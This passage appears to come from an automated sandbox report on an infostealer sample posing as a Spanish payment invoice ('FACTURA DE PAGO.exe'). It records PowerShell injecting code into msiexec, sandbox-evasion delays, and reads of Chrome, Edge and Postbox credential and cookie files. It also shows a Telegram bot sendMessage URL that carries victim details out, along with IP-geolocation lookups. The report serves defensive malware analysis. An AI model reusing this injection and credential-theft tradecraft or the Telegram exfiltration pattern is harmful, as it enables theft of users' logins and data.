            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -596329s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -596204s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -596079s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -595954s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -595829s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -595704s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -595579s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -595454s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -595329s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -595204s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -595079s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -594954s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -594829s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -594704s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -594579s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -594454s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -594329s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -594204s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -594079s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -593954s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeCode function: 0_2_00406033 FindFirstFileA,FindClose,0_2_00406033
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeCode function: 0_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004055D1
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599885Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599641Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599531Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599422Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599313Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599188Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599063Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598938Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598829Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598704Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598579Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598454Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598329Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598204Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598079Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597954Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597829Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597704Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597579Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597454Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597329Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597204Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597079Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596954Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596829Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596704Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596579Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596454Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596329Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596204Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596079Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595954Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595829Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595704Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595579Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595454Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595329Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595204Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595079Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594954Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594829Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594704Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594579Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594454Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594329Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594204Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594079Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593954Jump to behavior
            Source: msiexec.exe, 00000004.00000002.2920754309.00000000053F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(HW
            Source: msiexec.exe, 00000004.00000002.2920754309.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2920754309.000000000539A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeAPI call chain: ExitProcess graph end nodegraph_0-3395
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeAPI call chain: ExitProcess graph end nodegraph_0-3243
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 4260000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeCode function: 0_2_00405D51 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405D51

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000004.00000002.2931722428.0000000020F01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7864, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: Yara matchFile source: 00000004.00000002.2931722428.000000002100A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7864, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000004.00000002.2931722428.0000000020F01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7864, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            2
            Obfuscated Files or Information
            1
            OS Credential Dumping
            2
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts2
            PowerShell
            Boot or Logon Initialization Scripts1
            Access Token Manipulation
            1
            Software Packing
            LSASS Memory14
            System Information Discovery
            Remote Desktop Protocol1
            Data from Local System
            3
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)311
            Process Injection
            1
            DLL Side-Loading
            Security Account Manager11
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            11
            Encrypted Channel
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Masquerading
            NTDS1
            Process Discovery
            Distributed Component Object Model1
            Clipboard Data
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script31
            Virtualization/Sandbox Evasion
            LSA Secrets31
            Virtualization/Sandbox Evasion
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Access Token Manipulation
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
            Process Injection
            DCSync1
            System Network Configuration Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1538465 Sample: FACTURA DE PAGO.exe Startdate: 21/10/2024 Architecture: WINDOWS Score: 100 34 reallyfreegeoip.org 2->34 36 api.telegram.org 2->36 38 4 other IPs or domains 2->38 44 Found malware configuration 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 Yara detected GuLoader 2->48 54 4 other signatures 2->54 8 FACTURA DE PAGO.exe 30 2->8         started        signatures3 50 Tries to detect the country of the analysis system (by using the IP) 34->50 52 Uses the Telegram API (likely for C&C communication) 36->52 process4 file5 22 C:\Users\user\AppData\Roaming\...\Incuss.Pen, ASCII 8->22 dropped 56 Suspicious powershell command line found 8->56 12 powershell.exe 28 8->12         started        signatures6 process7 file8 24 C:\Users\user\AppData\...\FACTURA DE PAGO.exe, PE32 12->24 dropped 26 C:\...\FACTURA DE PAGO.exe:Zone.Identifier, ASCII 12->26 dropped 58 Early bird code injection technique detected 12->58 60 Writes to foreign memory regions 12->60 62 Found suspicious powershell code related to unpacking or dynamic code loading 12->62 64 3 other signatures 12->64 16 msiexec.exe 15 8 12->16         started        20 conhost.exe 12->20         started        signatures9 process10 dnsIp11 28 api.telegram.org 149.154.167.220, 443, 49755 TELEGRAMRU United Kingdom 16->28 30 reallyfreegeoip.org 188.114.97.3, 443, 49739, 49740 CLOUDFLARENETUS European Union 16->30 32 3 other IPs or domains 16->32 40 Tries to steal Mail credentials (via file / registry access) 16->40 42 Tries to harvest and steal browser information (history, passwords, etc) 16->42 signatures12

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            FACTURA DE PAGO.exe8%ReversingLabsWin32.Malware.Nemesis
            FACTURA DE PAGO.exe21%VirustotalBrowse
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kinna\FACTURA DE PAGO.exe8%ReversingLabsWin32.Malware.Nemesis
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://checkip.dyndns.org0%URL Reputationsafe
            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
            http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
            http://checkip.dyndns.org/0%URL Reputationsafe
            http://nsis.sf.net/NSIS_Error0%URL Reputationsafe
            http://crl.micro0%URL Reputationsafe
            https://aka.ms/pscore6lB0%URL Reputationsafe
            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            https://reallyfreegeoip.org0%URL Reputationsafe
            https://apis.google.com0%URL Reputationsafe
            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://reallyfreegeoip.org/xml/0%URL Reputationsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            216.58.206.46
            truefalse
              unknown
              drive.usercontent.google.com
              142.250.186.33
              truefalse
                unknown
                reallyfreegeoip.org
                188.114.97.3
                truetrue
                  unknown
                  api.telegram.org
                  149.154.167.220
                  truetrue
                    unknown
                    checkip.dyndns.com
                    193.122.6.168
                    truefalse
                      unknown
                      checkip.dyndns.org
                      unknown
                      unknowntrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        http://checkip.dyndns.org/false
                        • URL Reputation: safe
                        unknown
                        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20and%20Time:%2021/10/2024%20/%2019:09:45%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20971342%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                          unknown
                          https://reallyfreegeoip.org/xml/155.94.241.186false
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://www.office.com/msiexec.exe, 00000004.00000002.2931722428.00000000210F4000.00000004.00000800.00020000.00000000.sdmpfalse
                              unknown
                              http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1899557466.0000000005ABC000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://api.telegram.orgmsiexec.exe, 00000004.00000002.2931722428.0000000020FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                unknown
                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1896848086.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://api.telegram.org/botmsiexec.exe, 00000004.00000002.2931722428.0000000020FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1896848086.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                    unknown
                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20amsiexec.exe, 00000004.00000002.2931722428.0000000020FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                      unknown
                                      https://contoso.com/Licensepowershell.exe, 00000001.00000002.1899557466.0000000005ABC000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://www.office.com/lBmsiexec.exe, 00000004.00000002.2931722428.00000000210EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        https://contoso.com/Iconpowershell.exe, 00000001.00000002.1899557466.0000000005ABC000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://drive.usercontent.google.com/msiexec.exe, 00000004.00000002.2920754309.000000000540A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.2034849572.000000000540A000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          http://checkip.dyndns.orgmsiexec.exe, 00000004.00000002.2931722428.0000000020F01000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://drive.google.com/Kmsiexec.exe, 00000004.00000002.2920754309.000000000539A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016msiexec.exe, 00000004.00000002.2932772711.0000000022182000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2931722428.000000002100A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.0000000022053000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.00000000221D0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.00000000222A5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.0000000021FDE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.000000002202C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
